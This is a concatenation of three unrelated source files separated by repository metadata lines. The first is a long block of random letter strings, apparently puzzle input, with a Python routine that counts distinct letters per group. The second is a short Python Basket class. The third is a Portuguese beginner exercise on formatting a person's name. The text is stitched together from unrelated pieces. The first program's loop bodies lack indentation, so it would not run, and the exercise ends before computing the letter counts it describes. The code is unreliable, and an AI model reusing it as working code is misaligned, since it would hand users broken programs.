vlw
dslpbnkxmqeywajgz
gdxnywsqelmzbjkpa
laynbksqxgdpewmjz
lnaxmyjgzdewkqpbs
gmenasxzldywjkqbp
ibqosazldjcgpn
cdzslogaiqbjnp
vdjlbzyrqctgpnias
faclbinzpjsqgd
zrpsnfkce
vzsipnkcfe
kcfdepns
lfcpywnjaektsh
enspkrcfq
sodaxyhewlrntpqizfk
fcnrshpzowtyid
dopucjibnfszrymwth
dgftsryzwohinvp
wnaslokrfxjbdehmitzqvu
undqlzakofjsxmewtvbhir
onsrawtufdvlqeihxjzbmk
eokxgvqzilrtmahujdfsnbw
asmtkequ
sgmt
lkfbheti
tmhufgnqadxl
xnhgefy
lxhkpmng
agcnhx
dciwfxz
repwdbt
wudi
zkxswfdam
m
md
i
trjihfdulyap
splmgabkrt
ogpy
whvecnqi
us
txsrojkd
jbkpaz
r
r
zsvn
nszv
znsevb
ndszv
znsv
ermqlnsctupxwbozvfajykig
zgvfosexuympqlbcikjnwatrh
mtzylsxbqufecrpkwgvaiojn
gnktmeocvflzaypqwbxuisrj
jrnmtuihb
ldkp
d
fgtermukvqhbjw
kgfeywtbzuhvqjr
pyr
y
wdxksjutzpefaimlgvcn
gxaijdslbwpvuntcemfo
xhek
bhcky
syhqk
gtfzma
tafm
xlwvzdaj
vzjlpwdxa
jdtvwzlxa
wuhipnmfkgyt
hqjfsnxkurpi
mrpieq
erhmipq
qprmei
xylkdcpiqsbtfaughnm
mnfhdwubcaktsqgxyi
rfbmxscigauhdynktzq
subdykxqatmgifehnzvwc
xdmbgwiksrvy
xgbkdiyrvsw
wxvdgrksyib
xkhibslqdgwyvr
rvgydbmwiskx
zyjkdunfomiwsrb
wupjxhrckyalgeq
lwvmg
lmgvw
lgwvm
lvmgw
vmlgw
pqmwrcbfsuvlz
qgyl
qhaeducybxtioswzknpmflrjv
roqyhvibtflxjwzpmukcesdan
fabhcserviuw
uvebswrfchia
wvhafbrsuice
ylebqivmkjo
ivqljkbeyom
qyblvkojime
lmeqkijvoyb
i
i
i
i
bdxmkngyctjs
mjxdcksybgnt
cdmskgbnxtyj
xjcmbtygvnsdk
pwyvm
pvmyw
pyvwm
yombwpv
pfkldvqeoragwnybhcxm
ycbwxmvqunafjdpeh
pasdjqbhxnvfewycm
ahyepmvtcbfqwxdn
wzbvnoglayjmxcqkdefus
rwbfzmgctaelounvyqjs
gteswk
kwget
uoetgwky
jsfvz
f
naexsokztq
txenoqksza
kzoaxqtnse
etoaxsqzkn
stokeaznqx
i
s
muksvphjrqiwytcgeazdox
maqjtecgzordhswpxkvu
pagxzrdojuqtkwvmshce
cretaokjdwvhqpzmusxg
gvjpoxdezuhacqtrwksm
axtz
xzta
xazt
aztx
uphinta
hiutfpna
hptauin
autiphn
dnmicvtsfyaexhql
mdvyqlaeihxtcfsn
qxfcmvhaiensdtyl
hminsdcelqfvxayt
iftydesxhvalnmcq
bdugalfnrswiexzhv
dtorqhzulej
utypg
ypvjqtg
htbdpyv
yfrzptxw
gvyotp
glinqmfhkejtwsdpoz
sytgdefiohwvqnpzlajkm
gejwmtizspkdnfloqh
pgisoqletmkcdjnhzfw
getzrjoashy
wzyrhaesj
ntlearqfpgivudyckbhzx
lbpxnwgvfdtyrcquiehz
pzyfarleghcqnbtvuixd
y
yf
y
rgwiuk
uqdwkcxryt
krwu
ukwr
husrzwkb
ltbkq
bqlkt
qklixtb
opqjnigbv
jignpb
gnoijb
juhgylzeinb
ysdmtbolh
dmshlybot
odhbsmlyt
myohlbdts
holbanvctjrp
hprtbcvonalj
bhvrtclgojanp
blthajvrnpoc
sqxnujfhwibzgly
nomtivzqdbpek
clhgwbe
bchlep
qfztknilhrjvudw
emcpsxijanfbohz
yi
f
f
k
k
ozgbi
ingzo
ozigb
wygmekiqarlzodj
gioz
dwjgzayoxt
ztgmdywax
uynzextlgaidr
kgdtayxsz
jyzgtaxd
onhwlfjvutsgdieqbkpcaz
pduvntkegbjzfahwlqcosi
gczlbundyhijaepwqvokfts
woisjtgcpvbafnzqludehk
iobqnafdcthuzjvwseklpg
pnzvemwjtuqrbk
jpzimrwbqnuevkt
palmebjxigdqf
eaquifmjldgx
efbgilqxamjd
gfdixealzmoqj
jmtefqldgaix
v
vg
gbzxjiqlncvwermsykouahfpd
pcqznbdrmvoygxkwjfiauhlse
baodlefwjvrqmkupixhygzncs
yielbrgwndxhcaokvzpsqmujf
xfizdlocvgyjsawprubnq
xpgsmlbwovncauiyjfqdhrz
crsbaiwydzglfqvpjounx
wqkcuvjobdxfparsylgnzi
alevm
alhem
cgamelb
laem
ahmle
plsroqxcdwgnif
wlidgnqfpxcsr
xqrdisflnwpjgc
wndpicgxsflqr
wdlfrioxcpqsnmg
racgwm
wagcrm
wgrmac
ukpjsmecdzhqrf
pguzdhxqj
tyipuhzdjqavb
qdzlhwjbpuv
yjfzasnudectpwogri
rbfnjwysvioegpakqudzc
icgrxnfdlwuosahemypz
tvxjqhykae
eylhkdzvtjxcbafg
ykejtaxvh
jktxhevay
kyvhtejoax
co
wf
kivymhdufeqng
cbqdheuoa
bwngdclequvktmfxhspzoria
djxbqcutoysngwlvefkmrahpzi
lxcdsnbtufgziqpkermowhav
tiwlmhonvbxakupczredgfsq
wtdefvnmrzsxlqacgobkupih
bxrcpmiztyqd
pbmcx
xmpcbe
mpxbc
ayvxwrcleznfgumst
slcvaugmywnrxfzkte
juymvptzgasxnlrfwce
ymnesdwalzcxvfrutg
pbzheiuvcftm
zvuebmhpcf
fhzpuebcqmxv
zbqplxehvcmfu
ezbmfhcvup
tohicqmx
hmitqofc
qtiocmy
fhoqrbicm
qcdmoin
hwlfdrqpxzc
fvaxghb
eyoskujmnt
bpeqfhocrkdlmjxy
xpmbqfeourcjdhkyl
bxkqjydpholmcfre
orxqpydlcejhfbkm
fzmohvgjnqtukrwxdsiclbpye
qxdbojrpevcnhizslutgkmfwy
pumcrjzwhiyqknsoadegflbtx
x
x
x
x
xrjoylduagqevnhpst
zhtuiqnysorebvgjp
ogysvweiqfd
ivwdosrgyq
ofgiqvydws
giyzxvwmnoudbas
zvkjeyr
jvehkyp
yvhkemj
evylxkj
zlkopmndbahetxru
uwktlbdomjxa
fmxlugbtkjd
subcxyvdkqitml
rzpwoycbevqlgjkais
ybazpqnuoswivgjkex
bkwypqa
qakybp
pkbyaq
znywvqolt
znywovqlt
znodtqlywv
vzotrnwyql
vytonqlwz
ckxlpjsvnf
lpnsjcxvfk
ucklvjfaspn
penkjixvclsf
klcnjfvpxs
jtepn
npejt
bjtepn
qjnpet
enjtp
yeqbd
eyqb
baqye
ybqe
nqio
qniog
ofgincq
eonvqi
hxtklwpfdojynbcva
lokyhscijfpnabvxtw
jxzbhdfmstgrneo
xeordzmfnghtsbj
rnmjzhxtgodbesf
fjmgnedszothbxr
trjmnfohesxdgzb
hqslympetxkibvfnjcw
vloudtrbgyznjai
ynrlpshmkzgfixjoc
hjlprmycfdibwnxkzgo
grilyhjanmtfqkepuxcz
zkpgrbfhxijynmlc
nxcgdm
bdmnjxg
xmgnd
nmxdg
nxmdg
mvrglcyiouxzbwkten
ezpbuqswtgflax
qutenswlmkcpxyojf
xosnwgtemrcjayuqlfp
fetwknupljyscxomq
dtm
t
tu
mt
xpydvgrqtzni
hjrnpytzviqg
evmtrqbapngyz
qntgxvrpyz
ypnvizkqcgrt
yseiov
owech
wimkqg
cyfkmu
dixolbvzqrsmkngchyw
fcxmntrhqiywzoplg
xkywriavgscpzojfmqld
fpwgshaulqojidzrxmecyv
ifvlnyamdoqrxcjwzsgp
eucon
ceak
cxzgfet
enirbc
orcel
webdsv
wvsbe
swcvbe
ewsohvzajicx
sevfgmoja
stearbovdmj
axnguqohjryzdctepwklvbf
dkcofwzhapnlmxtujbegqrv
jcxfvsanwihekulprobgtdzq
jhrcozflwenkdbpyaxvtguq
rlewujhcpngqkxbdtozvfa
xagvlwqd
vwgdylaq
dblaiqwgv
qlargvjwd
wqldvag
pqdwyontbigjuxreh
owxgrpqnaiuteb
pteiubxogrqfwn
wluvsydimgkhajen
welkivzdgsmouhaj
otkpyhg
hykgot
thokyg
thokgym
emxigrtuvopkcdfbqy
yfqxotgecimuvp
epmtquxgicovlyf
tfiqvxpmyegouc
poefxyvgtjmiqcu
bqo
f
o
s
mjwb
bm
bm
mb
uf
upf
uf
hj
jh
jh
jh
jh
gzryfascidjxh
cehvodsgakqx
zieswmajyohcbqpx
ftdjszwyrnaxhkcb
oxqrnim
movrpnq
omanqukr
qgomsnauryxz
sez
iesz
sez
sze
rotfxvuakil
lstfikxqh
ytjpcefx
qvjmgnrzlaktidcwfoeyb
jintwomkrfedyapbzglcvq
iwjldonrvgtaqzkbfemyc
cveodbrzgfxaqnwymltjhki
idkgtyulwcbzaqovjrmfne
dienhzus
zniuhles
iqnezuhs
zhncseiu
shuiezn
hjznyixqtvpfc
xacirus
ebicux
qlkwrhft
bxgr
obgcsnuvhtkrqzjwd
ozdtrhvnucbwgjkyqs
qgvnrwbkudtszohcj
bqzkvgocturwnjsdh
hkjgqsrvzwbnudtco
uefxdgbzmpwaqcijltryhsk
xhuqzjrimeswdklfpt
nqjfewuhtmksizprlxd
vgjnp
vgjn
jvndg
ojwuqzkbmicagn
rzbkwjalotqfng
npkbyqavjgzdwo
kmqoapifvtdj
vfjtpdamqoik
avoidxfmpjkqt
vadistqfmkxpjo
fiqetmoawpjdrkv
dckjnl
cgmenlydujk
lktjgcru
maclgkje
kcoljvzwfbxip
gpjl
iprbgl
otvhqzerlyaujgmnc
ochwnerugqy
iepxgnhcbusdqrfo
ptd
dxt
t
ut
nfijtkag
sgwbckhifomlujapdqty
mzrauwfexjvqhnp
gaeqcjwmbvxdfoshku
kvjacqyblnroifzhmpsdtu
snbipuqjvzctxeak
dzktbyirsaejmnouq
neukjtqbazis
qtbukanzjeis
nqtbzixekfcjasu
ndthqsfbmrjewkizolcaupyx
zcvpdyijbrlwukoxtfhsnqmea
pyzmtlbhrugiansjxdwfqkeco
fkmztiqjbsoahrnxelcudywp
uqwmbntlaiedyfhjrcsozxpk
swf
wsf
fws
pylmrdzqcfkheai
sutfpgvnombwx
zoymuqdtwnlepfc
coldftwqenzypm
vpoyzcdhlqmewtfn
nofzqyhdmclptkew
tenrpqywldcazxomf
nmjbidsagxlv
jzvxndgml
tfrjvqhdumolexc
mdjslxv
obeit
gpc
cru
wduxj
wcxjd
wgkbjnh
jdies
e
by
by
by
yb
v
v
dv
v
v
urwztvnydg
utdvgyzw
ztudvygwi
wtgvryzeud
dteyugwvz
w
w
wj
frnqtxauwhjm
jxtahqfnmkewurg
anmjurtfxqhdw
tjnxwmiuaqlrfh
emnjhwtrafuxbq
vgxoswfbiau
caobkxwgsvif
ovsyafgdbiwx
baqodwgvfxis
wadgsifxvbo
f
ltc
j
lcf
wjvyqcr
vjwqcyr
wjrqvmyc
qwvjrcy
jutzxfmikywse
jozticyxewdq
czeiltwjgnxyq
ctejywpqshzximvln
tpncexjlyhwvsmiqz
vspytcwmlhznjxqei
czxnahseitmy
ecnmtasihxy
bhltqnfx
hbtfxlqn
lfqntbxh
snbhtyqflx
txhnbfloq
wjq
keyuntrvxjhzla
qjgm
dj
tsmgrnh
omnsht
zytlxkasmnhqw
fetgshnm
mhrfdstne
pwltrqjzasxecbymikgv
xwzkbvsptgcalremijyq
ropziwxqtkmvelgayjbcsu
sxjapleiwzvmqgbyrtck
nrdgyhlkafzec
wfqzprgyekhl
oevkhbrytlj
ofyszptied
lvknfazwydp
lpdfzyg
deisyavhcrobz
oebridchamvsy
bihdacjrvoyse
ieorhabcyvds
qpo
opq
qpo
kowxye
ewk
ebuw
jew
jewnk
zma
amz
mza
mrzua
zma
gbjnofwepatird
rtlhjdpoewfbi
cjwibpzodmxtref
tjrdbeofipwv
knblqihwtyrvudpcj
uonmrkaxlcivdqybph
clxbgnipvhkrdquy
eupsyfqkjwlhn
leqpjyfknhs
lysnfjhkpe
ghnympekzslfj
okzfb
obzk
ozgkb
j
j
wscmbevigl
mlsbviecg
vigmslbce
cmgbviels
bgiecmvls
ihvla
znxhmqi
hikrl
hi
ujnqvrfpmkbzhxodiys
bzriqeufxvsmhjoyncwpd
vgtxozijuhnpfdalymbr
tsnaqeofkjmz
sywmloigkb
lmhobusck
kvylwnrg
kvlgrwn
vlgnrwk
gkrvwnl
kxugrsjonbhye
kbuxseonhyrgj
uhnkregsyoxjb
uorgbehxysnkj
advzsqg
qrxmfcag
nqgwayzevd
puwnjhel
jolweuhnp
lnwipueqhj
zun
vp
y
ogauy
zfguoa
qcnpemx
mpeqxc
dmecxqtp
aph
rpha
hasp
aph
pah
iwqlboj
wijolbq
oqilrbjwf
inobjqlw
sxv
yvx
jwkegcvosnfdzat
fjbktsndozac
fjoxave
xnfvao
vfaxo
vxoaf
bfcuamhkglwziyjtr
tgblomxfisvnck
gwvksbd
wkprbs
bkslv
kbthasmf
dlkrgbs
epczdwhmbvxtqj
uzxwmvchbqejd
bmexqiwzhujvcd
jzvtleoniaudwkpcgfmsqy
ctifjxaknmvlypguzeqod
qjmkyn
ahjygqo
yowhmuq
fvzdcrxqytb
ig
ig
ig
gaui
gi
tpdkcloqanbhgruyzwveji
tachrljnpevwyzigksbduqo
tjuzackylwdqeonpgibhvr
cinujltpvrdeskozgahwfybq
ewpkgcubazhrjxiytnolqdv
nxkqbayoclt
odykbnt
tofvbykin
kyotdvbn
kotbyn
qzrludbmenpoychtxsv
breuhyzmqwxnovpd
qnpobxrgvzmehjdyu
yzqvxdokmaueirhnbp
slrojqcvy
syvrcoqjl
oekrcjslvqy
cjorvslyq
ieb
edbi
ibxe
ljpvngtimfceb
ubdaiopgrqlxekyf
fxladregykpobiqu
ogdyxiaubrqkelpsf
dterlayxgbfqipkuo
akqpxdleiyforbgu
wtolyupagvsi
gvpioswtauy
mwgckfxlrseyv
xwmklvfzseogyc
xdsfhlgwtcknemyv
yncfxwsvmekgl
iozr
msaqc
nvjdcxs
jyralpdhevs
zytrwavujnpgsedh
ujwpohtlsaeikgn
xeqpvmzkonauswcgjhi
wesnkpgioufjah
xhmquay
ibwzste
fwdb
gmolphac
achpmql
lmacp
plcmtav
frlvut
kiewoghxnczs
gqackoyhextlb
aybocxkqtegh
waxltoybhceqkg
hrkgxapityqebvmoc
xlbngteqcyohka
nijvfszwupdxtklbq
uativywzlbpkxndfqj
lrinjwkaxdvfbuqtpz
tkgenjbfviwxdocuqzmpl
flnpjidyzbtwsxqvuk
m
n
mq
h
m
kxmjusioqeglt
vdnjboreftphwgacy
dqyr
jkwro
kri
or
bwjflmnzer
jnegwb
ebphjacsounwv
mozfbwstjypiahuek
nuawhmklyvoejqgdfs
csfuwkyhjmoea
kgwamofsejyhu
zgv
vrzg
zb
b
b
wroqfnxtvmzlcjhkigpy
phislkyrvfczmtqngowx
rgimcptvlzfoxqhwnky
ycoxklznupsvwfqmrihgt
ugtkiavlzmbcjdwh
mawhcdnujskgzvli
evwaqpyiockmuzgjdrh
njqkoue
hmlwp
rmvqfznjd
kjvrdzqfnumc
mzjqdvrftn
dznrjvcqfm
afmsutzkbcphynlvx
zdbnmhairpjvtlyux
sqoltmkryjv
wkmfgjyvhuslzq
vrsybmqljk
vklqmryjs
bjqsxpkvmly
kdxc
xkdlc
cdkxf
kcdx
lscpxrwvjmdfukhnyao
srkuvodlahpfyqmxjncw
ahmldxfkoysrjcpuvwn
ospdwcnjfhyrkmlavxu
aojpyrkwdxnflmuchvs
nruxazdsbpivjcyhmo
pcjinbmuzadohgxyvsr
pczehkynmvlgoasq
gsuvonpkymaqeh
jpvmqhuoesgakyn
epqoksgmhayvrn
uzadcejqiymbhvn
wyazmqevuihdjbfc
bmhnyjcvzaqideu
jymhvbqtopelcuzadi
oplus
pusl
rzpslnux
lwpsu
hjslpu
ftdpru
ocpfntdwgu
jicg
botnkcgemqaldpijrfv
jcihg
ijcug
gcji
gwjrpk
mtadxzyfoqevsnbl
uigkphc
cdwlsgohm
djk
qrdbzfteina
dco
xdyu
gwfvicuz
cwzgfuqi
zcwgfuqi
iwgcfuz
wzgciuf
tkfpjzyenihv
epkvjithfc
tljhiekvfp
vcikptejhlf
sujcyqxo
mdjnewvfptlzk
vfkndpmlzejtw
zjvewmfnpdtkl
nyflwevxom
jehzdrvoyfbtqs
ytbedfgancms
tgsdbymafenc
ymtbnecfdsga
efnytdabgcms
ebloc
beo
ebo
boe
lnvoewrfzi
mwehcfpinrkx
dsfawiurnge
ewqcrnfjxip
twbqs
ybhifuwjgx
fagriw
qtwd
pzkewvlnmo
ntfmixybewk
chkfqnutybz
rmyxsoltfhzjcunwkgepdiaqvb
ywnzlpvbaxqirktcsdhmjeufog
vyxdtz
mjqgwplrs
pujbn
hrulo
wpkr
aoulbqcjef
ydqxzwrmgcols
pjtbvklcoq
lhqnocite
zfxhp
zdxboe
wzqx
twdqyomarski
rktioayj
rkyqaiodgmt
yoicntabkrxzehf
tkaloryiu
ghxi
zkh
hieyqmtxwgl
vnmielcqy
uhrzob
cubho
asjfntubepq
hioubg
kpxcjbywfdqsa
bwldycjpkxafsq
xqkapcwybjsdf
kcj
jvdk
jcmkd
ktbj
xjeckz
krwuosxgcp
rxcwoupgk
gpeocfxrlwuk
xuocphrgkw
jnlwcdyhzepv
rthxfcjmlspqobzn
egrjhuskvxzmiabt
igzvujmxhasrkbet
avubzktghijrsmex
abizvetgxukhjrms
zfiw
hc
hl
nl
oqknymrdihjcseba
ncxmsaqbohejdyr
oeahgbscqmjnrdy
dycjqhbaomensr
rpbonjmaqydcshe
p
py
p
cyqjsari
cqspedy
cuspyq
sqceuyd
k
kb
qk
whejxikaybvrdcq
rdihyakqvwbjce
eivyrdcsqjbmkahw
qihackrwybjdve
jznsueg
fdkrnypzoig
ibnloptgz
kruvzocmatj
kvtzjucwm
ytgjidcpvulxmzk
cvukhtjrbqzwame
tvuwbnmzkcjrsh
j
o
yxagcowndvtpjrkqzfi
qcarjtovwypkgidxfzn
rfpwykaxcqnvtoizjdg
ayfzntcqiowrjpdxkvg
hwmpvgjrkliqyozubnxtf
uktnfhcyxlvgrjqmbzs
huxgbfrmzyqtklavjn
qbnhmagjxyrtczusikpfvlo
xtrmcugjfpzhblqinvoyks
hmyzknpjtcrqfsubxlvgoi
wqm
fzenkoua
yqt
liydh
jlcvyg
rhjtaempquozksbyvnfwdxic
unbaykrcvzohtswexqjdf
cjrkutbedazoqvhywsfnx
kucftryxodqanvjbhwsez
kosunjblazirvfehp
wiqhcbnoptxfkzavuey
fhgkeisnalvopzrbu
u
u
u
bquzfcipegxsntovar
osvxpeqfnbrzicutga
txneuqbvgpcisfzor
kgpwbeqoutzslrvncifx
qiectvrzopxbgsufn
gxzmqchdnivs
avhklufnxrmy
ogziculqfebm
befcmalquvh
aequnfvbcml
ywpbkxedzmrhsg
lrzmkpsuxyej
krxysemzpf
ekpzysuxrm
dvfnrmbqykpozciuxagelsjh
psumybrvcqdnhkaflioxjgez
jgkmsviadexy
aczkmjyxhips
wkyxabosimjn
iekgnp
jqhsnmdrupix
cfliapw
pyvizhg
rzxnpkamhyst
fkhtlvomwznyg
tdvujrfolsnqpia
jalidfvorpsqtun
rdfojtqiluansp
rjtuipsnoahfldq
nyfiadlqwcjkrtpobsmu
qjktphlif
iepygaqktlf
qfkpidlt
yhcgpfevjualt
cafvjthpeylg
lcpefvtgahyj
klswmayo
mdlpekoywxu
klwyoam
bwlmoyak
okmwily
stgzrq
gqtszr
grqszt
stgrqz
t
t
t
gv
y
jhxo
vjmozikwxpran
nivcrdzwokjae
wazfivnrejko
azxhbdvkjygfirsnloq
fbdaiqwykrghvszujnlxo
nihqgvrjfsblxdozkya
buxsrykzw
yzkrtwxbs
xzrykmsvbwfh
skxybwrz
qnj
n
n
tvejbm
mvjbte
tejvbm
mbejtv
jbuvetam
figqoerjmdcyzbhktv
ngetcmforjdxzvqikbh
sydujtzqwcghorepfbxk
vyzbslpdxhuqjfocenmkg
kolvxqsynhiwzca
gzeuxktnavrqcoislhwy
aybxskqmcvldhpjnfziwo
oxvc
ox
yfdo
elsy
syl
syl
ysl
w
w
w
w
w
ogursc
rcogqs
jh
jxehk
ghujy
zqwjh
jhm
sxbqrhwiag
eaqrbhftivcuwxyg
vu
b
z
aqbmdrlg
rneqdmalf
irfdmqebla
srmhqlaokd
iyhpnoe
yohnipred
inohepy
yhipeon
itdsohyjaxqmbpfvekn
zundqjexhiyolfabpmvk
bnvimhpfawyedkqojx
eczua
eaucz
ebaucz
ezauc
qbwaslyjgu
ljuyqzbgsia
buqjlsg
umglqcbjs
bhnfseujqlg
bqofjigeahsumyx
rxzpwuhfcabvnled
sknoyvjtuehwqblxmdza
bfjhrdwcaeonklpvqugmyt
joqegwhlvmit
esnvrgltxqdij
bhlqi
hb
dyfhxgbvp
bh
l
l
xrs
drlzkesu
olfgitqwh
dregsvkpwxay
bkyduamsixp
kslmxdpqayf
uesngibrkydpwv
dbsvugprniky
nbexgp
exwpnb
bxnpeg
bnxupez
rpviaunzhewtyxkgoqbj
heyrovwqixupkgjbnatz
rvqgwebatikzuonypjhx
iwvbqjngeykrzapotxuh
koqnvjzeyptbgiwrauxh
jdw
wenj
skfyquivmgjhalcwzb
hmvawsueklfqpozniy
zhlmnoygesuakqpivw
viqmunszaphklexywo
mkayohvqxnpleuzwis
ihnmpequvkszawloy
dzlviyskfoxeqn
cspaigujmnhdwb
pty
yp
yp
ybp
ybp
rj
rj
kzphsgyu
pszhgkyu
sgkuyhzp
pskzughy
akqvneflpdmjuz
maujklznvqfe
knazfuemvqgljc
flav
vkxrlcf
fo
rg
seagph
gw
logtwpkdjehzqbfaucrn
ujekaqnfbhcrltwogzpd
ofprtcvawjlbeudgnkzqh
dgwnoutzjlhbpckarefq
rlupwtdbaegqzcjknfoh
yifavpnc
stkrd
rwdex
xgwjvybumqocikz
jowivhfslc
nvwoarjci
ojivnhsacw
lwyhzkiuem
euzhmnvfliy
xeoajwlycvnprd
rynvwehzcogutjpdax
efinpwyjdvoracx
x
gux
x
ax
ygoviptclrsnahw
tbzskmxufeqld
lsa
lja
p
z
r
z
kgvriwzjadluhstpm
gukzqdjwpnirhmlbcsfao
ldwrajs
asjrldw
xawcnhkidgtrzyfsqeopu
ahtvofclrqmgnpud
hpnxugjifey
mxeltkycuhag
ubhrzxgyod
ny
dfkjrpoxzy
bliyhtmw
yg
may
a
h
vmjuwdyqstaohxricgnpbfkz
whbgascpeuvoityqnzmkfxrljd
soxhwnuzibdrckpfjgymtqva
dwkztnbocgyjqimhpsaxufrv
szcxpmibqyajwotfurvhkdgn
ncj
jn
jn
nj
nj
jmksvqnybwchitlx
hvmkbyixzclqwtnjsp
icmytjxhlwpnvqksb
hsbwkqyrtilcjmdnaxov
nqhviwjysulkxcgbtm
hevkuqgxdr
sajqfty
ngziqckmx
wogycuq
guwqoyc
wucqgoy
ucoqwgy
ougqydcw
hfjbcmeky
rmxnjofyb
gdvlyuzpbmqj
fmdqswle
lmebuyfostwd
tmdqeyswluf
fqmesudwl
wnrpmdclifezjs
xkghnzwpfesty
ejwxtosypngzkfh
xdgrsetaznhkylfpw
hfvskxtgonpzyew
etnaiwcogmxryljzpvuskdf
icoxtnupdwmsfglrjeaz
jgomncpxdfeubzlratwis
wsdomrcxezpuangfljti
vwxlezg
vwzxeg
zvexgwa
vgwzhex
pase
pfebz
evwpi
epsf
pe
qaorjipshwtbmyz
zuqynhfgcsxramkd
wyxrqz
sjirb
vr
jekdnziasqgfxvphbc
ilghjvcezsqmafkbn
ojkihsdgbzrexmnwlpq
wrjozskgehqpilbmdnx
znsqwmbohridpkgeljx
yzihvsrgx
lmvyrgxb
xcvrnmueylfkg
mxs
gcr
mix
us
bqflzknjtv
f
f
f
wogldbvj
mugjldx
xjdlg
jgsdnl
atkl
tkabcz
yldakb
atk
apvomkg
wxhloqejbgty
gmoyexqjbtwk
nrsyeuibfzqogvaxp
unm
nu
un
eun
uixqnvo
wmlpqcjv
szmrfex
shaouxm
qhyolkraitwf
aytiqohvjw
awqxuhyoit
mdivcj
ixmjdv
imdvj
owcpev
toizevcpw
traiwckoughzs
wrshgqkucioatz
whszcautokrgi
usizrwhacogkt
kzjy
yikgzeh
ykzq
kdzyop
doiu
hiousq
vegibuo
inmazxpoujtw
furbqkplwoncigmd
dulmpbrgqicofkw
orcqtaimhpguldkbwf
kwpsqbemljdcifgoru
qmfkulpoiwdbcrg
zjsuqchlyvgf
dztuaqwsvyk
tdqloumshziryfn
hluniyrfmzqjods
syonlqfdrzuihm
holysqmnifrutdz
znfudymoqlhirpcs
vgydrpsqc
qyicrsvzpgo
crvpsqguy
qafvh
qfhyav
faqhvc
qfvahy
vfqah
iy
siy
vwzk
zwvk
kvwnz
lahzdvmwk
vyxn
yn
dypnq
oinrys
yjn
zsfmbtuxew
uzbxtswfem
mtfxeuzwbs
fxezutmbysw
bskmqxyjgirztlwpaedcouhf
eiaughtyzdqsxoclpmkbwjfr
qfrcypouztmsjagibhwlkexd
ojhuykgawmbdlricpsztefxq
ihokalnevpsjgz
gzkhijespona
kjohgnesipaz
zgjhkneaoibsp
guhosr
rgoash
sry
dirctmsz
osr
cpzrqsbvu
bfcl
vsbadzcpeqoutyn
cyfzdqeorpnas
dhasgzeocynqp
chqepsxozandjwy
wd
dwu
dw
zcldswqk
axgunp
fthovyjimreb
kc
cky
kdc
zckybmorwuse
ymorbcekvlszw
ebyszcmrqkwo
yzsmeorkbwqc
fbosnwxlhtmvcupy
ysgcmuixlpovhfbw
vopfmhyusxwlrcb
fxulogwptvmhcsby
bypcxhmowslqufvn
gvbfisnt
watfgbvi
fibvg
mbcrvoyfgij
mzn
emxc
hborqpj
lkxipeb
rqwfkonvzac
vfmlncguqe
nflmvqiceug
legqnvfmuic
vlnucoegmfq
ubprjdnyateshimflwzkc
ucrfwjkilnmpstyzbhade
umbdizaewlsjhtynfpkcr
cnvmso
hvt
jadtmfzbcsr
rsimbnctzaodfl
mzqdscbwrfat
eaw
vewa
aew
geilhxoqvbujr
qiuvelgrjobxh
xlbirohejgqvu
knudqfalrwt
gswapxdyoqflth
teom
dmteo
temo
eotm
mteo
jalnoyhgstp
ojangphiystlq
nolapjtyghs
gcpwyotlnajsh
gtybajhlqpnso
anjvewuhxfki
otpqhwycvlrxdeja
wzhxveaj
jvewhaxkfn
gazhwbemvfxj
fnouedx
foxndeuh
xofunde
vgkrxoezlbcymsiwhqn
txeowmjvlbhyic
ymvlhbceixupawo
vqugltmfiwxaobhcersky
ywvexqigkblzrmatofscu
drumgbei
vdipsfwnujqglzatky
deigu
xhucordgbi
uqmrdlhbkjpexgtnwvoiy
qkhltvgwenmbuxyijrp
bhtygxiwnklfejuqvmpr
wypljgnehmquitvrbkx
rmnxghvujzkcf
zlwextoqnyji
lixsebojpdnz
pslqajezynbx
bx
kbexu
m
t
taxk
tx
pxft
xt
qctvexujkgzsy
zlkycvfuqxowe
ohq
hlgq
phib
lnzuywcit
uytbilwn
iylhnefrtwg
dtsxzhcq
thcszdq
hctzsidq
vc
cmr
kalcozstu
pgwxmbj
wgpj
ngcftamyqlzexb
vbmxaftcn
afvmbnxptc
xskzlaqc
laxgqsczk
zxqkslac
ghlkczsxaq
wkscpazeytolxq
cgpevkzi
igvtezpkq
vgckizep
sdugxecjhniat
unagscidhtjxe
dcneasigtkjzxuhm
vnqf
dhg
y
kopazxjbeuicstw
rnhjmcdsio
hatrkdnbwicso
dhacjnorsi
isodhrngcet
qshvfdilncor
a
ea
aux
vgdaqruzjiemskln
njmyefvguzlikaqs
vankiqgljcsemuzt
kmevqgszinapjul
nlvumkehbjzgioaqs
yztl
gzyl
vorqly
madgj
mjgdwua
jmgad
gmjda
fukp
ojqxyn
bkr
rmsp"""
all_groups = []
current_group = set()
all_groups.append(current_group)
for line in data.split("\n"):
line = line.strip()
if line == "":
current_group = set()
all_groups.append(current_group)
else:
current_group.update(line)
s = 0
for g in all_groups:
    s += len(g)
print(s)
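# A more compact way to compute the same total (sketch; assumes the groups in `data`
# are separated by single blank lines, as in the string above):
# print(sum(len(set(group.replace("\n", ""))) for group in data.split("\n\n")))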
| [
"charlch@users.noreply.github.com"
] | charlch@users.noreply.github.com |
29156ba1d65e04552c8a58d16cf74743e89ed231 | f820d23a92ea5050b9bd6d9eff346532bf64a950 | /cucumber.py | 5b8360d11e34242043045d1d1722155d084ada17 | [] | no_license | aidardarmesh/behave | af84cb42c6e7fa3b1b45ff1ed424341dba1aec62 | 64aa16af5ee8c0b8b68ce56fad6237abe81551ec | refs/heads/master | 2022-11-30T16:15:54.914006 | 2020-08-12T17:35:33 | 2020-08-12T17:35:33 | 287,071,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | class Basket:
def __init__(self, initial_weight):
self.weight = initial_weight
| [
"darmesh.aidar@gmail.com"
] | darmesh.aidar@gmail.com |
44aad35f7613823b2d12a50659cae6c14f302f18 | fb227f203e2f330acc08d06345b2e7acef9c885e | /Exercícios/ex022.py | b9150d254bd182603a5bde67515f4d6725dd17aa | [] | no_license | adannogueira/Curso-Python | aa27718835bb53b78f16c8e7b2e6528cdf64d3c0 | 59cb1a3914cd4f8e011379a1c653da5b0caed7c6 | refs/heads/main | 2023-08-15T02:08:21.988587 | 2021-10-01T14:57:08 | 2021-10-01T14:57:08 | 412,474,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | # Create a program that reads a person's full name and shows:
# The name with all letters in uppercase
# The name with all letters in lowercase
# How many letters in total (not counting spaces)
# How many letters the first name has
nome = str(input('Digite seu nome completo: ')).strip()
espaco = nome.count(' ')
primeiro = len(nome.split()[0])
print(f'Nome em maiúsculas: {nome.upper()}')
print(f'Nome em minúsculas: {nome.lower()}')
